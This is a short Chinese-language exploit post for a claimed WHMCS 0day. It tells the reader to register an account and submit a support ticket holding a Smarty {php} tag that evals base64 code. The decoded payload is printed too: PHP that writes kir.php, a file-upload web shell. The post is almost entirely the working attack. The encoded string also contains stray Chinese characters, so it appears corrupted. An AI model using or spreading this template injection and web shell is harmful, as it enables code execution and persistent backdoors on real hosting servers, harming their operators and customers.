whmcs主机管理系统0day

利用方法
先注册个id

提交一个ticket如下



{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFi游戏JwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php} 



 


base64解密后：
[pre]$code&nbsp;=&nbsp;<?php&nbsp;echo&nbsp;'<form&nbsp;action=&quot;&quot;&nbsp;method=&quot;post&quot;&nbsp;enctype=&quot;multipart/form-data&quot;&nbsp;name=&quot;uploader&quot;&nbsp;id=&quot;uploader&quot;>';&nbsp;echo&nbsp;'<input&nbsp;type=&quot;file&quot;&nbsp;name=&quot;file&quot;&nbsp;size=&quot;50&quot;><input&nbsp;name=&quot;_upl&quot;&nbsp;type=&quot;submit&quot;&nbsp;id=&quot;_upl&quot;&nbsp;value=&quot;Upload&quot;></form>';&nbsp;if(&nbsp;$_POST['_upl']&nbsp;==&nbsp;&quot;Upload&quot;&nbsp;)&nbsp;{&nbsp;if(@copy($_FILES['file']['tmp_name'],&nbsp;$_FILES['file']['name']))&nbsp;{&nbsp;echo&nbsp;'<b>Upload&nbsp;SUKSES&nbsp;!!!</b><br><br>';&nbsp;}&nbsp;else&nbsp;{&nbsp;echo&nbsp;'<b>Upload&nbsp;GAGAL&nbsp;!!!</b><br><br>';&nbsp;}&nbsp;}&nbsp;?>&nbsp;$fo&nbsp;=&nbsp;fopen(&quot;kir.php&quot;,&quot;w&quot;);&nbsp;fwrite($fo,$code);&nbsp;[/pre]


则成功创建了一个php小马。
&nbsp;
*